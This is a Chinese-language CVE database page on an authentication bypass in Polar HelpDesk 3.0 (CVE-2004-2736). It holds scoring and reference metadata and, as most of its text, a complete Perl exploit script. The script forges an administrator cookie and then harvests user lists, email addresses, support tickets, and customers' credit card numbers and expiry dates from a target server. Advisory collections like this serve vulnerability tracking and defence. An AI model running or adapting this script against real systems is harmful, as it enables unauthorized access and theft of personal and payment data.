CVE-2004-2736
CVSS5.0
发布时间 :2004-12-31 00:00:00
修订时间 :2008-09-05 16:44:58
NMCOE    

[原文]Polar HelpDesk 3.0 allows remote attackers to bypass authentication by setting the UserId and UserType values in a cookie.


[CNNVD]Polar Helpdesk基于cookie的认证系统绕过漏洞(CNNVD-200412-1067)

        Polar HelpDesk 3.0存在漏洞。远程攻击者可以通过设置一个cookie中UserId和UserType的值绕过认证。

- CVSS (基础分值)

CVSS分值: 5 [中等(MEDIUM)]
机密性影响: NONE [对系统的机密性无影响]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: NONE [对系统可用性无影响]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: NETWORK [攻击者不需要获取内网访问权或本地访问权]
身份认证: NONE [漏洞利用无需身份认证]

- CWE (弱点类目)

CWE-287 [认证机制不恰当]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2736
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-2736
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200412-1067
(官方数据源) CNNVD

- 其它链接及资源

http://xforce.iss.net/xforce/xfdb/16778
(UNKNOWN)  XF  polar-helpdesk-weak-security(16778)
http://www.securityfocus.com/bid/10775
(UNKNOWN)  BID  10775
http://www.securiteam.com/windowsntfocus/5OP0K0ADGA.html
(UNKNOWN)  MISC  http://www.securiteam.com/windowsntfocus/5OP0K0ADGA.html
http://www.osvdb.org/8168
(UNKNOWN)  OSVDB  8168
http://secunia.com/advisories/12120
(VENDOR_ADVISORY)  SECUNIA  12120

- 漏洞信息

Polar Helpdesk基于cookie的认证系统绕过漏洞
中危 授权问题
2004-12-31 00:00:00 2007-10-10 00:00:00
远程  
        Polar HelpDesk 3.0存在漏洞。远程攻击者可以通过设置一个cookie中UserId和UserType的值绕过认证。

- 公告与补丁

        It is reported that this vulnerability is addressed in the current build of Polar HelpDesk. This is not confirmed.
        Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com .

- 漏洞信息 (24302)

Polar Helpdesk 3.0 Cookie Based Authentication System Bypass Vulnerability (EDBID:24302)
asp webapps
2004-07-21 Verified
0 Noam Rathaus
N/A [点击下载]
source: http://www.securityfocus.com/bid/10775/info

Polar Helpdesk is reported prone to a cookie based authentication system bypass vulnerability. It is reported that the authentication and privilege system for Polar Helpdesk is based entirely on the values read from a cookie that is saved on the client system. An attacker may modify values in the appropriate cookie to gain administrative access to the affected software.

#!/usr/bin/perl
#
# Beyond Security Ltd.
# The below sample will do:
# 1) Grab a user list
# 2) Grab each user's email
# 3) List all available Inbox tickets
# 4) List all tickets with charge on them, and the credit card number and their expiration date

use IO::Socket;
use strict;

my $host = $ARGV[0];
my $base_path = $ARGV[1];

my $remote = IO::Socket::INET->new ( Proto => "tcp",
       PeerAddr => $host,
       PeerPort => "80"
       );

unless ($remote) { die "cannot connect to http daemon on $host" }

print "connected\n";

$remote->autoflush(1);

my $content = "txtPassword=admin&txtEmail=admin\@admin&Submit=Log+in";

my $length = length($content);

my $base_path = $ARGV[1];

print "Get user list\n";

my $data_get_userlist = "GET /$base_path/user/modifyprofiles.asp HTTP/1.1\r\
Host: $host\r\
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.6) Gecko/20040405 Firefox/0.8\r\
Connection: close\r\
Cookie: HelpDesk_User=UserType=6&UserID=1;\r\
\r\n";

print $remote $data_get_userlist;
# print $data_get_userlist;

sleep(1);

my @names;
while (<$remote>)
{
 if (/<td>Results /)
 {
  while (/<a href="profileinfo.asp\?ID=([0-9]+)">([^<]+)<\/a>/g)
 {
  my $Item;
  $Item->{ID} = $1;
  $Item->{Name} = $2;
  print "ID: ".$Item->{ID}." Name: ".$Item->{Name}."\n";
  push @names, $Item;
 }
 }
}
close $remote;

print "Get users' email\n";

my $data_get_userdata = "";
foreach my $name (@names)
{
 $remote = IO::Socket::INET->new ( Proto => "tcp", PeerAddr => $host, PeerPort => "80" );

 unless ($remote) { die "cannot connect to http daemon on $host" }

 $data_get_userdata = "GET /$base_path/user/profileinfo.asp?ID=".$name->{ID}." HTTP/1.1\r\
Host: $host\r\
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.6) Gecko/20040405 Firefox/0.8\r\
Connection: close\r\
Cookie: HelpDesk_User=UserType=6&UserID=1;\r\
\r\n";

 print $remote $data_get_userdata;
# print $data_get_userdata;

 sleep(1);

 while (<$remote>)
 {
  if (/name="txtEmail" value="/)
 {
  /name="txtEmail" value="([^"]+)"/;
  print "ID: ".$name->{ID}.", Email: $1\n";
 }
 }
 close($remote);
}

print "Get Inbox tickets\n";

my $data_get_inboxtickets = "GET /$base_path/ticketsupport/Tickets.asp?ID=4 HTTP/1.1\r\
Host: $host\r\
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.6) Gecko/20040405 Firefox/0.8\r\
Connection: close\r\
Cookie: HelpDesk_User=UserType=6&UserID=1;\r\
\r\n";

$remote = IO::Socket::INET->new ( Proto => "tcp", PeerAddr => $host, PeerPort => "80" );

unless ($remote) { die "cannot connect to http daemon on $host" }

print $remote $data_get_inboxtickets;
#print $data_get_inboxtickets;

sleep(1);

while (<$remote>)
{
 if (/Ticket #/)
 {
# print $_;
  while (/<a href="tickets.asp\?ID=4&Personal=&TicketID=([0-9]+)[^>]+>([^<]+)<\/a>/g)
 {
  print "Ticket ID: $1, Name: $2\n";
 }
 }
}

close($remote);

print "Get billing information\n";

my $data_get_billing = "GET /$base_path/billing/billingmanager_income.asp HTTP/1.1\r\
Host: $host\r\
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.6) Gecko/20040405 Firefox/0.8\r\
Connection: close\r\
Cookie: HelpDesk_User=UserType=6&UserID=1;\r\
\r\n";

$remote = IO::Socket::INET->new ( Proto => "tcp", PeerAddr => $host, PeerPort => "80" );

unless ($remote) { die "cannot connect to http daemon on $host" }

print $remote $data_get_billing;
sleep(1);

my @tickets;

while (<$remote>)
{
 if (/Ticket No./)
 {
  my $Item;
  /<a href="..\/ticketsupport\/ticketinfo.asp\?ID=([0-9]+)">([^<]+)<\/a>/;
 $Item->{ID} = $1;
 $Item->{Name} = $2;
  print "Ticket ID: ".$Item->{ID}.", Name: ".$Item->{Name}."\n";
  push @tickets, $Item;
 }
}

close($remote);

foreach my $ticket (@tickets)
{
 my $data_get_billingcreditcard = "GET /$base_path/billing/billingmanager_ticketinfo.asp?ID=".$ticket->{ID}." HTTP/1.1\r\
Host: $host\r\
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.6) Gecko/20040405 Firefox/0.8\r\
Connection: close\r\
Cookie: HelpDesk_User=UserType=6&UserID=1;\r\
\r\n";
 $remote = IO::Socket::INET->new ( Proto => "tcp", PeerAddr => $host, PeerPort => "80" );

 unless ($remote) { die "cannot connect to http daemon on $host" }

 print $remote $data_get_billingcreditcard;
 sleep(1);
 
 my $Count = 0;
 my $Print = 0;
 while (<$remote>)
 {
  if ($Print)
 {
  $Count ++;
  if ($Count > 1)
  {
   /<td[^>]+>([^<]+)<\/td>/;
   print $1, "\n";
  $Print = 0;
  }
 }
 if (/Expiration date<br>/)
 {
  print "Expiration date: ";
  $Count = 0;
  $Print = 1;
 }
  if (/Credit Card<br>/)
 {
  print "Credit Card: ";
  $Count = 0;
  $Print = 1;
 }
 }
}
		

- 漏洞信息

8168
Polar HelpDesk Cookie Modification Privilege Escalation
Remote / Network Access Authentication Management
Loss of Integrity
Exploit Public

- 漏洞描述

Polar HelpDesk contains a flaw that may allow a malicious user to gain access to unauthorized privileges. The issue is triggered when a user sends a specially crafted cookie to the server. This flaw may lead to a loss of integrity.

- 时间线

2004-07-22 Unknow
2004-07-22 Unknow

- 解决方案

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

- 相关参考

- 漏洞作者

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站